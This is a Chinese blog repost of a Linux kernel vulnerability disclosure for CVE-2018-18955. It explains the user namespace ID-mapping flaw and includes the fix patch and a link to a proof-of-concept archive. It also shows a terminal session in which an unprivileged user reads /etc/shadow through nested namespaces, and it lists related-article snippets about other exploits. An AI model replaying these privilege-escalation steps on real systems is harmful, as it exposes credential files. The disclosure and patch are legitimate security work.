近期Linux漏洞,CVE-2018-18955

最新推荐文章于 2023-06-28 16:06:53 发布
最新推荐文章于 2023-06-28 16:06:53 发布
阅读量373 收藏
点赞数
文章标签: 近期Linux漏洞

commit 6397fac4915a ("userns: bump idmap limits to 340") increases the number of

possible uid/gid mappings that a namespace can have from 5 to 340. This is

implemented by switching to a different data structure if the number of mappings

exceeds 5: Instead of linear search over an unsorted array of struct

uid_gid_extent, binary search over a sorted array of struct uid_gid_extent is

used. Because ID mappings are queried in both directions (kernel ID to

namespaced ID and namespaced ID to kernel ID), two copies of the array are

created, one per direction, and they are sorted differently.

In map_write(), at first, during the loop that calls insert_extent(), the member

lower_first of each struct uid_gid_extent contains an ID in the parent

namespace. Later, map_id_range_down() is used in a loop to replace these IDs in

the parent namespace with kernel IDs.

The problem is that, when the two sorted arrays are used, the new code omits the

ID transformation for the kernel->namespaced mapping; only the

namespaced->kernel mapping is transformed appropriately.

This means that if you first, from the init namespace, create a user namespace

NS1 with the following uid_map:

0 100000 1000

and then, from NS1, create a nested user namespace NS2 with the following

uid_map:

0 0 1

1 1 1

2 2 1

3 3 1

4 4 1

5 5 995

then make_kuid(NS2, ...) will work properly, but from_kuid(NS2) will be an

identity mapping for UIDs in the range 0..1000.

Most users of from_kuid() are relatively boring, but kuid_has_mapping() is used

in inode_owner_or_capable() and privileged_wrt_inode_uidgid(); so you can abuse

this to gain the ability to override DAC security controls on files whose IDs

aren't mapped in your namespace.

To test this, I installed the "uidmap" package in a Ubuntu 18.04 VM with the

following /etc/subuid and /etc/subgid:

user@ubuntu-18-04-vm:~$ cat /etc/subuid

user:100000:65536

user2:165536:65536

user3:231072:65536

user@ubuntu-18-04-vm:~$ cat /etc/subgid

user:100000:65536

user2:165536:65536

user3:231072:65536

user@ubuntu-18-04-vm:~$

Then, as the user "user", I compiled the two attached helpers (subuid_shell.c

and subshell.c):

user@ubuntu-18-04-vm:~/userns_4_15$ gcc -o subuid_shell subuid_shell.c

user@ubuntu-18-04-vm:~/userns_4_15$ gcc -o subshell subshell.c

subuid_shell.c uses the newuidmap helper to set up a namespace that maps 1000

UIDs starting at 100000 to the namespaced UID 0; subshell.c requires namespaced

CAP_SYS_ADMIN and creates a user namespace that maps UIDs 0-999, using six

extents.

I used them as follows to read /etc/shadow:

user@ubuntu-18-04-vm:~/userns_4_15$ id

uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)

user@ubuntu-18-04-vm:~/userns_4_15$ ls -l /etc/shadow

-rw-r----- 1 root shadow 1519 Jul 4 16:11 /etc/shadow

user@ubuntu-18-04-vm:~/userns_4_15$ head -n1 /etc/shadow

head: cannot open '/etc/shadow' for reading: Permission denied

user@ubuntu-18-04-vm:~/userns_4_15$ ./subuid_shell

root@ubuntu-18-04-vm:~/userns_4_15# id

uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

root@ubuntu-18-04-vm:~/userns_4_15# cat /proc/self/uid_map

0 100000 1000

root@ubuntu-18-04-vm:~/userns_4_15# ls -l /etc/shadow

-rw-r----- 1 nobody nogroup 1519 Jul 4 16:11 /etc/shadow

root@ubuntu-18-04-vm:~/userns_4_15# head -n1 /etc/shadow

head: cannot open '/etc/shadow' for reading: Permission denied

root@ubuntu-18-04-vm:~/userns_4_15# ./subshell

nobody@ubuntu-18-04-vm:~/userns_4_15$ id

uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)

nobody@ubuntu-18-04-vm:~/userns_4_15$ cat /proc/self/uid_map

0 0 1

1 1 1

2 2 1

3 3 1

4 4 1

5 5 995

nobody@ubuntu-18-04-vm:~/userns_4_15$ ls -l /etc/shadow

-rw-r----- 1 root shadow 1519 Jul 4 16:11 /etc/shadow

nobody@ubuntu-18-04-vm:~/userns_4_15$ head -n1 /etc/shadow

root:!:17696:0:99999:7:::

nobody@ubuntu-18-04-vm:~/userns_4_15$

Here is a suggested patch (copy attached to avoid whitespace issues); does this

look sensible?

==================

From 20598025d5e80f26a0c4306ebeca14b31539bd97 Mon Sep 17 00:00:00 2001

From: Jann Horn

Date: Mon, 5 Nov 2018 20:55:09 +0100

Subject: [PATCH] userns: also map extents in the reverse map to kernel IDs

The current logic first clones the extent array and sorts both copies, then

maps the lower IDs of the forward mapping into the lower namespace, but

doesn't map the lower IDs of the reverse mapping.

This means that code in a nested user namespace with >5 extents will see

incorrect IDs. It also breaks some access checks, like

inode_owner_or_capable() and privileged_wrt_inode_uidgid(), so a process

can incorrectly appear to be capable relative to an inode.

To fix it, we have to make sure that the "lower_first" members of extents

in both arrays are translated; and we have to make sure that the reverse

map is sorted *after* the translation (since otherwise the translation can

break the sorting).

This is CVE-2018-18955.

Fixes: 6397fac4915a ("userns: bump idmap limits to 340")

Cc: stable@vger.kernel.org

Signed-off-by: Jann Horn

---

kernel/user_namespace.c | 12 ++++++++----

1 file changed, 8 insertions(+), 4 deletions(-)

diff --git a/kernel/user_namespace.c b/kernel/user_namespace.c

index e5222b5fb4fe..923414a246e9 100644

--- a/kernel/user_namespace.c

+++ b/kernel/user_namespace.c

@@ -974,10 +974,6 @@ static ssize_t map_write(struct file *file, const char __user *buf,

if (!new_idmap_permitted(file, ns, cap_setid, &new_map))

goto out;

- ret = sort_idmaps(&new_map);

- if (ret < 0)

- goto out;

-

ret = -EPERM;

/* Map the lower ids from the parent user namespace to the

* kernel global id space.

@@ -1004,6 +1000,14 @@ static ssize_t map_write(struct file *file, const char __user *buf,

e->lower_first = lower_first;

}

+ /*

+ * If we want to use binary search for lookup, this clones the extent

+ * array and sorts both copies.

+ */

+ ret = sort_idmaps(&new_map);

+ if (ret < 0)

+ goto out;

+

/* Install the map */

if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) {

memcpy(map->extent, new_map.extent,

--

2.19.1.930.g4563a0d9d0-goog

==================

(By the way: map_id_up_max() is probably pretty inefficient, especially when

retpoline mitigations are on, because it uses bsearch(), which is basically a

little bit of logic glue around indirect function calls. If you care about

speed, you might want to add an inline variant of bsearch() for places like

this.)

Proof of Concept:

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip

天冷喝粥
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2018-18955漏洞学习
weixin_30847939的博客
05-08 564
简介 这是名称空间的漏洞,文章先介绍user namespaces的简单只是,然后从补丁入手,分析源码,找到漏洞出现的原因。因为对这块的源码不是那么熟悉,所以着重描述源码分析的部分,其他可以参考末尾的链接 本文出现的代码都基于linux-4.15.4 namespace linux中有实现名称空间,用来隔离不同的资源,实现原理就是将原本是全局的变量放到各个namespaces之中...
KindEditor文件上传漏洞(CVE-2018-18950)
m0_65150886的博客
01-03 1630
漏洞存在于小于等于kindeditor4.1.5 编辑器里,你能上传.txt和 .html文件,支持php/asp/jsp/asp.net。/php/upload_json.php文件不会清理用户输入或者检查用户是否将任意文件上传到系统。通过构造一个恶意的 html文件来实现跳转,钓鱼等,恶意攻击者可实现。1.直接删除upload_json.和file_manager_json.即可。​​​​​​​6.访问html文件如下。7.抓包,上传txt文件,获取返回路径。8.访问上传文件,发现成功上传。
Linux内核提权漏洞CVE-2023-32233复测及POC脚本
qq_18209847的博客
05-17 1585
近日,研究人员发现了Linux内核的NetFilter框架中的新漏洞CVE-2023-32233)。问题的根源在于tfilter nf_tables是如何处理批处理请求的,经过身份验证的本地攻击者可通过发送特制的请求破坏Netfilter nf_tables的内部状态,从而获得更高权限。目前,研究人员还开发了一个PoC。注意:一旦在易受攻击的系统上启动了PoC(概念验证),该系统可能会处于不稳定状态,并且内核内存可能被破坏。我们强烈建议在专用系统上测试PoC,以避免可能的数据损坏。
漏洞修复】 CVE Linux 系统应用漏洞修复笔记
张小三的博客
02-07 6745
根据SSL/TLS协议信息泄露漏洞(CVE-2016-2183)原理,通过发送精心构造的数据包到目标服务,根据目标的响应情况,验证漏洞是否存在。启动完成后查看nginx的版本信息,验证nginx的openssl版本号是否已经升级成功。原本我的nginx中使用的openssl 版本号为:1.0.2s。结束后在此查询openssl的版本号,验证是否升级成功。目录,使用以下命令下载最新版的安装包到此目录下。将以下的内容替换 nginx 的443配置中的。进入nginx的安装目录下的。目录下启动nginx。
CVE-2023-1829】Linux Kernel权限提升漏洞CVE-2023-1829)centos7解决方案
西原一点红的博客
06-28 2151
如果你需要进行内核模块的开发或构建,你可能需要安装 kernel-lt-headers 和 kernel-lt-devel 包。而如果你只是想安装最新的长期支持内核版本,你可以直接安装 kernel-lt 包。kernel-ml 中的ml是英文【 mainline stable 】的缩写,elrepo-kernel中罗列出来的是最新的稳定主线版本。kernel-lt 中的lt是英文【 long term support 】的缩写,elrepo-kernel中罗列出来的长期支持版本。B. 与当前版本差异小。
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
最新发布
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。... 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -...
Linux pkexec高危漏洞 CVE-2021-4034修复
02-10
polkit rpm包 执行rpm -Uvh polkit-0.112-26.el7_9.1.x86_64.rpm 即可修复
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
linux 漏洞CVE-2019-14287和CVE-2021-4034
任雪飘的博客
02-26 4909
大家好,我是任雪飘,一个刚接触web的菜鸡。我们今天一起复现一下linux老版本漏洞,普通用户利用sudo获得系统root权限操作系统! 现在我们重新创建一个新用户 给这个用户设置策略,就是不给他root权限,气死你 ceshi1 这个账号确实没有了root 权限的身份了 现在我们测试这个漏洞是不是存在 既然是root 权限了,那我们修改其他用户的密码吧!看下图是不是完美了 到此处CVE-2019-14287 漏洞复现完毕。 接下 下来我们就要去玩脚本...
Linux——使用者身份切换
小顽固的博客
10-14 440
1、su [root@study ~]# su [-lm] [-c 指令] [username] 选项与参数: - :单纯使用 - 如『 su - 』代表使用 login-shell 的变量文件读取方式来登入系统; 若使用者名称没有加上去,则代表切换为 root 的身份。 -l :与 - 类似,但后面需要加欲切换的使用者账号!也是 login-shell 的方式。 -m :-m 与 -p 是一...
安全预警:独立发布的Oracle严重 CVE-2018-3110 公告
Enmotech的博客
08-13 1186
2018年8月10日,Oracle 独立的发送了一封"安全警告"邮件给所有的 Oracle 用户,这封邮件的标题是:Oracle Security Alert for...
CVE-2018-10933 身份验证绕过漏洞验证
锋刃科技的博客
10-28 6870
0x00 事件背景 2018-10-16 libssh发布更新公告旨在解决CVE-2018-10933的问题 libssh版本0.6及更高版本在服务端代码中具有身份验证绕过漏洞。 通过向服务端提供SSH2_MSG_USERAUTH_SUCCESS消息来代替服务端期望启动身份验证的 SSH2_MSG_USERAUTH_REQUEST消息,攻击者可以在没有任何凭据的情况下成功进行身份验证。 进而可...
linux 内核漏洞 2018,Linux发行版高危严重漏洞 CVE-2018-14665
weixin_26716079的博客
05-01 724
安全研究人员在X.OrgServer软件包中发现了一个影响主要Linux发行版的高度严重漏洞(CVE-2018-14665)。安全研究员NarendraShinde在X.OrgServer软件包中发现了一个非常关键的漏洞(CVE-2018-14665),它影响了主要的Linux发行版,包括OpenBSD,Debian,Ubuntu,CentOS,RedHat和Fedora。XorgX项目提供了XW...
CVE-2018-8174漏洞两种姿势的复现
热门推荐
qq_39627497的博客
12-06 1万+
CVE-2018-8174漏洞两种姿势的复现 CVE-2018-8174漏洞两种姿势的复现 漏洞介绍: 该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该0day漏洞进行了修复,并将其命名为CVE-2018-8174。 复现过程1: 1、...
容器安全概述
悦分享
07-04 4261
Docker是目前最具代表性的容器技术之一,对云计算及虚拟化技术产生了颠覆性的影响。以Docker为代表的容器技术,直接运行于宿主机操作系统内核,因此对于容器安全,很多人会有着这样的疑问:EDR(Endpoint Detection and Response)等主机安全方案,能否直接解决容器安全的问题?概括来说,容器/容器云安全,可以包括以下四个类别:第一,就是容器环境基础设施的安全性,比如主机上的安全配置是否会影响到其上面运行的容器,主机上的安全漏洞是否会影响到容器,主机上的恶意进程是否会影响到容器,容器
Linux驱动——高级I/O操作(四)
qq_52479948的博客
04-19 613
阻塞 IO:在资源不可用时,进程阻塞,阻塞发生在驱动中,资源可用后进程被唤醒,在阻塞期间不占用CPU,是最常用的一种方式。非阻塞 I/O: 调用立即返回,即便是在资源不可用的情况下,通过返回值来确定 IO操作是否成功,如果不成功,程序将在之后继续尝试。对于大多数时间内资源都不可用的设备 (如鼠标、键盘),这种尝试将会白白消耗 CPU 大量的时间,如果将尝试的间隔时间增加,又可能会产生不能及时处理设备的数据。
如何修复linux漏洞 CVE-2022-0847
07-15
要修复Linux漏洞CVE-2022-0847,您可以按照以下步骤进行操作: 1. 更新系统:确保您的系统已经更新到最新的软件包版本。使用以下命令更新软件包: ``` sudo apt update sudo apt upgrade ``` 2. 安装补丁:检查是否有适用于CVE-2022-0847漏洞的补丁可用。如果有,请使用以下命令安装补丁: ``` sudo apt install <补丁包名称> ``` 如果没有特定的补丁可用,您可以考虑升级相关软件包来修复漏洞。 3. 验证修复:在安装完补丁或升级后,重新启动相关服务或系统,并验证漏洞是否已修复。您可以参考相关文档或咨询相关社区以获取更多信息。 请注意,具体的修复步骤可能因操作系统版本、Linux发行版和漏洞的具体细节而有所不同。因此,在执行任何操作之前,建议您先仔细阅读相关文档,并确保了解适用于您的系统的正确修复方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值